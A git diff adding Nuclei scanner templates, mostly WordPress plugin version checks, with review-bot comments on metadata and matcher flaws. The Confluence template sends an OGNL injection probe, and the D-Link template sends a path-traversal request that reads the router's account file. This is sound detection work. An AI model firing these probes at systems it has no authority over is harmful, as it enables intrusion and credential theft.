@@ -0,0 +1,55 @@ +id: CVE-2021-26084 + +info: + author: dhiyaneshDk,philippedelteil + severity: critical + name: Confluence Server OGNL injection - RCE + description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. + tags: cve,cve2021,rce,confluence + reference: + - https://jira.atlassian.com/browse/CONFSERVER-67940 + - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-26084 + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://github.com/Udyz/CVE-2021-26084 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-26084 + cwe-id: CWE-74 + +requests: + - raw: + - | + POST /{{path}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + + payloads: + path: + - pages/createpage-entervariables.action?SpaceKey=x + - pages/createpage-entervariables.action + - confluence/pages/createpage-entervariables.action?SpaceKey=x + - confluence/pages/createpage-entervariables.action + - wiki/pages/createpage-entervariables.action?SpaceKey=x + - wiki/pages/createpage-entervariables.action + - pages/doenterpagevariables.action + - pages/createpage.action?spaceKey=myproj + - pages/templates2/viewpagetemplate.action + - pages/createpage-entervariables.action + - template/custom/content-editor + - 
templates/editor-preload-container + - users/user-dark-features + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'value="aaaa{140592=null}' diff --git a/poc/docker/amazon-docker-config-exposure.yaml b/poc/docker/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/docker/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/exposed/amazon-docker-config-exposure.yaml b/poc/exposed/amazon-docker-config-exposure.yaml new file mode 100644 index 0000000000..c006721468 --- /dev/null +++ b/poc/exposed/amazon-docker-config-exposure.yaml @@ -0,0 +1,17 @@ +id: amazon-docker-config-disclosure + +info: + name: Dockerrun AWS Configuration Exposure + author: pd-team + severity: medium + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and \ No newline at end of file diff --git a/poc/other/agency-toolkit.yaml b/poc/other/agency-toolkit.yaml new file mode 100644 index 0000000000..61562b6e3d --- /dev/null +++ b/poc/other/agency-toolkit.yaml 
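Review bot: The `payloads.path` list contains `pages/createpage-entervariables.action` twice (second and tenth entries), so every non-vulnerable host receives a redundant POST before `stop-at-first-match` can help; drop the duplicate. The request block also uses the legacy `requests:` key while every other template in this commit uses `http:`, and `cvss-score: 9.80` breaks the `9.8` formatting used elsewhere — both worth normalising, since current nuclei releases treat `requests` as deprecated (confirm against the version in use). The probe is benign arithmetic (`#{16*8787}` evaluated server-side and matched as `{140592=null}`), but it is a real OGNL evaluation on the target, which the description could say explicitly so operators know the template is safe to run but still visible in Confluence logs.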
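Review bot: `id: amazon-docker-config-disclosure` does not match the new file name `amazon-docker-config-exposure.yaml` and presumably was copied from an existing disclosure template, so the repository now carries the same template id under more than one path; nuclei flags duplicate ids at load time, and the identical copy added under `poc/exposed/` compounds the problem — set `id: amazon-docker-config-exposure` and keep one copy. The matcher has no status check, so add `- {type: status, status: [200]}` alongside the word matcher with `matchers-condition: and`. The block also uses the legacy `requests:` key where the rest of this commit uses `http:`.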
@@ -0,0 +1,59 @@
+id: agency-toolkit-c4d0da08ce2ccde8e115ab3f856365e3
+
+info:
+ name: >
+ Agency Toolkit <= 1.0.23 - Missing Authorization to Unauthenticated Arbitrary Options Update
+ author: topscoder
+ severity: high
+ description: >
+ The Agency Toolkit plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'agency_toolkit_import' action in all versions up to, and including, 1.0.23. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9f5cdb47-205a-4c03-a8a9-f39d1b4fc769?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/agency-toolkit/"
+ google-query: inurl:"/wp-content/plugins/agency-toolkit/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,agency-toolkit,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/agency-toolkit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "agency-toolkit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.23')
\ No newline at end of file
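Review bot: `severity: high` contradicts `cvss-score: 9.8` and the `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` vector, which sit in the critical band (9.0–10.0) of CVSS v3.1; either set `severity: critical` (and the trailing `high` tag) or correct the score. `cve-id:` is left empty while `tags` still carries `cve`, so the template is routed into CVE-filtered runs without an identifier; fill the id in or drop the tag. Since the only check is a version gate on `Stable tag:` in readme.txt, a host with a stale readme or with the plugin present but inactive is reported exactly like a vulnerable one, which the `description` could say in one sentence.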
diff --git a/poc/other/animation-addons-for-elementor.yaml b/poc/other/animation-addons-for-elementor.yaml
new file mode 100644
index 0000000000..3a7ecf8834
--- /dev/null
+++ b/poc/other/animation-addons-for-elementor.yaml
@@ -0,0 +1,59 @@
+id: animation-addons-for-elementor-8cb2b19594b70ed1d20a65da8b6d2986
+
+info:
+ name: >
+ Animation Addons for Elementor <= 1.1.6 - Authenticated (Contributor+) Sensitive Information Exposure via Content Slider and Tabs Widget Elementor Template
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/animation-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/animation-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,animation-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/animation-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "animation-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/other/biagiotti-membership.yaml b/poc/other/biagiotti-membership.yaml
new file mode 100644
index 0000000000..81a29180ee
--- /dev/null
+++ b/poc/other/biagiotti-membership.yaml
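Review bot: `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` are all empty in this template while `tags` still says `cve` and `shodan-query: 'vuln:'` is a placeholder; the same pattern is repeated in the biagiotti-membership, broken-link-finder, button-block, clients, cm-answers, collapsing-categories, both download-manager, easy-waveform-player, echoza, filester, gaga-lite, grip, one-paze, philantro, scancircle, both simple-notification, so-widgets-bundle, taeggie-feed and tourmaster hunks. Nuclei tolerates the empty scalars, but the `classification` block then conveys nothing and the `cve` tag pulls these into CVE-filtered runs with no identifier; either populate the fields from the referenced Wordfence advisory or remove the empty keys and the tag. Each template is only a version gate on `Stable tag:` in readme.txt (or `Version:` in style.css for the three theme templates), so a hit means an old version string was served, not that the flaw is reachable; one sentence to that effect in `description` would help triage. Every new file also ends without a trailing newline.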
@@ -0,0 +1,59 @@
+id: biagiotti-membership-890b34de1d7826afddfee44c27d08a72
+
+info:
+ name: >
+ Biagiotti Membership <= 1.0.2 - Authentication Bypass via biagiotti_membership_check_facebook_user
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f319df-41eb-484a-8fca-af6ae76f4179?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/biagiotti-membership/"
+ google-query: inurl:"/wp-content/plugins/biagiotti-membership/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,biagiotti-membership,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/biagiotti-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "biagiotti-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml b/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml
new file mode 100644
index 0000000000..743adaa9ed
--- /dev/null
+++ b/poc/other/broken-link-finder-4ff2e9009576af041b5a7e782318ee33.yaml
@@ -0,0 +1,59 @@
+id: broken-link-finder-4ff2e9009576af041b5a7e782318ee33
+
+info:
+ name: >
+ Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/broken-link-finder/"
+ google-query: inurl:"/wp-content/plugins/broken-link-finder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,broken-link-finder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "broken-link-finder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.0')
\ No newline at end of file
diff --git a/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml b/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml
new file mode 100644
index 0000000000..e3624d70fd
--- /dev/null
+++ b/poc/other/button-block-ebc0f1c83e52f295da4b8e511e072df7.yaml
@@ -0,0 +1,59 @@
+id: button-block-ebc0f1c83e52f295da4b8e511e072df7
+
+info:
+ name: >
+ Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/button-block/"
+ google-query: inurl:"/wp-content/plugins/button-block/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,button-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "button-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.5')
\ No newline at end of file
diff --git a/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml b/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml
new file mode 100644
index 0000000000..12d403f6fb
--- /dev/null
+++ b/poc/other/clients-41225319ecc15ac24c062330ae8b961c.yaml
@@ -0,0 +1,59 @@
+id: clients-41225319ecc15ac24c062330ae8b961c
+
+info:
+ name: >
+ Clients <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/49589caf-232b-4067-a607-2902e932553e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/clients/"
+ google-query: inurl:"/wp-content/plugins/clients/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,clients,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clients/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clients"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.4')
\ No newline at end of file
diff --git a/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml b/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml
new file mode 100644
index 0000000000..68c080e813
--- /dev/null
+++ b/poc/other/cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce.yaml
@@ -0,0 +1,59 @@
+id: cm-answers-b0d0c22beaaa6f4ccde4c61443cc4cce
+
+info:
+ name: >
+ CM Answers <= 3.2.6 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/91a20180-871b-4208-b11e-d3ff2a7e8d23?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cm-answers/"
+ google-query: inurl:"/wp-content/plugins/cm-answers/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cm-answers,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-answers/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-answers"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.6')
\ No newline at end of file
diff --git a/poc/other/collapsing-categories.yaml b/poc/other/collapsing-categories.yaml
new file mode 100644
index 0000000000..d02b12e207
--- /dev/null
+++ b/poc/other/collapsing-categories.yaml
@@ -0,0 +1,59 @@
+id: collapsing-categories-b92da15653f7212a9df1f5d57bdcbceb
+
+info:
+ name: >
+ Collapsing Categories <= 3.0.8 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05153b11-2f26-425e-99ab-93216861802b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/collapsing-categories/"
+ google-query: inurl:"/wp-content/plugins/collapsing-categories/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,collapsing-categories,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/collapsing-categories/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "collapsing-categories"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.8')
\ No newline at end of file
diff --git a/poc/other/dlink-850l-info-leak.yaml b/poc/other/dlink-850l-info-leak.yaml
new file mode 100644
index 0000000000..254efe51b6
--- /dev/null
+++ b/poc/other/dlink-850l-info-leak.yaml
@@ -0,0 +1,29 @@
+id: dlink-850L-info-leak
+
+info:
+ name: Dlink Dir-850L Info Leak
+ author: pikpikcu
+ severity: info
+ reference: https://xz.aliyun.com/t/2941
+ tags: dlink
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/hedwig.cgi"
+ body: |
+ ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
+ headers:
+ Cookie: uid=R8tBjwtFc8
+ Content-Type: text/xml
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ - ""
+ part: body
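Review bot: In the dlink-850l-info-leak hunk the word matcher lists two empty strings (`- ""` twice), which every response body satisfies, so any 200 from `/hedwig.cgi` is reported and the template degenerates to a status check. It looks like XML tag names were stripped when this file was produced; if so, restore the original tokens, otherwise the matcher needs real markers from the DEVICE.ACCOUNT.xml response before the template is useful. `severity: info` also looks understated for a template whose name and target file describe account data being returned; a one-line `description` explaining what a hit means would let triage judge that.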
diff --git a/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml b/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml
new file mode 100644
index 0000000000..46f417a9e6
--- /dev/null
+++ b/poc/other/download-manager-0b3c1d139da969d81ea373f38d201244.yaml
@@ -0,0 +1,59 @@
+id: download-manager-0b3c1d139da969d81ea373f38d201244
+
+info:
+ name: >
+ Download Manager <= 3.3.03 - Unauthenticated Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7be578-5883-4cd3-963d-bf81c3af2003?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/download-manager/"
+ google-query: inurl:"/wp-content/plugins/download-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,download-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "download-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.03')
\ No newline at end of file
diff --git a/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml b/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml
new file mode 100644
index 0000000000..30e9c2a61f
--- /dev/null
+++ b/poc/other/download-manager-81cd1d79de28b7aae9b449e5f006a9f6.yaml
@@ -0,0 +1,59 @@
+id: download-manager-81cd1d79de28b7aae9b449e5f006a9f6
+
+info:
+ name: >
+ Download manager <= 3.3.03 - Improper Authorization to Unauthenticated Download of Password-Protected Files
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/feb915f4-66d6-4f46-949c-5354e414319b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/download-manager/"
+ google-query: inurl:"/wp-content/plugins/download-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,download-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/download-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "download-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.03')
\ No newline at end of file
diff --git a/poc/other/easy-waveform-player.yaml b/poc/other/easy-waveform-player.yaml
new file mode 100644
index 0000000000..19ccc98abf
--- /dev/null
+++ b/poc/other/easy-waveform-player.yaml
@@ -0,0 +1,59 @@
+id: easy-waveform-player-d8187a1daf11c2f64ad81046a48d9c78
+
+info:
+ name: >
+ Easy Waveform Player <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/17a0d8b3-e54d-4af4-8915-e8b192cc138b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/easy-waveform-player/"
+ google-query: inurl:"/wp-content/plugins/easy-waveform-player/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,easy-waveform-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/easy-waveform-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "easy-waveform-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml b/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml
new file mode 100644
index 0000000000..7aafcbf145
--- /dev/null
+++ b/poc/other/echoza-e1decf47b202b8b552a71edd87b20231.yaml
@@ -0,0 +1,59 @@
+id: echoza-e1decf47b202b8b552a71edd87b20231
+
+info:
+ name: >
+ Echoza <= 0.1.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3823fedd-f5b9-420d-98b5-8b7bfc6b02de?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/echoza/"
+ google-query: inurl:"/wp-content/plugins/echoza/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,echoza,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/echoza/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "echoza"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.1.1')
\ No newline at end of file
diff --git a/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml b/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml
new file mode 100644
index 0000000000..bd9488addf
--- /dev/null
+++ b/poc/other/filester-568e78f1e3709813a32ee8f38f2cd07a.yaml
@@ -0,0 +1,59 @@
+id: filester-568e78f1e3709813a32ee8f38f2cd07a
+
+info:
+ name: >
+ File Manager Pro – Filester <= 1.8.6 - Missing Authorization to Authenticated (Subscriber+) Filebird Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/filester/"
+ google-query: inurl:"/wp-content/plugins/filester/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,filester,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/filester/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "filester"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml
new file mode 100644
index 0000000000..6b9d6e87ba
--- /dev/null
+++ b/poc/other/gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80.yaml
@@ -0,0 +1,59 @@
+id: gaga-lite-f2a32ddf27d02f7ada6388e3c4206c80
+
+info:
+ name: >
+ Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/gaga-lite/"
+ google-query: inurl:"/wp-content/themes/gaga-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,gaga-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/gaga-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
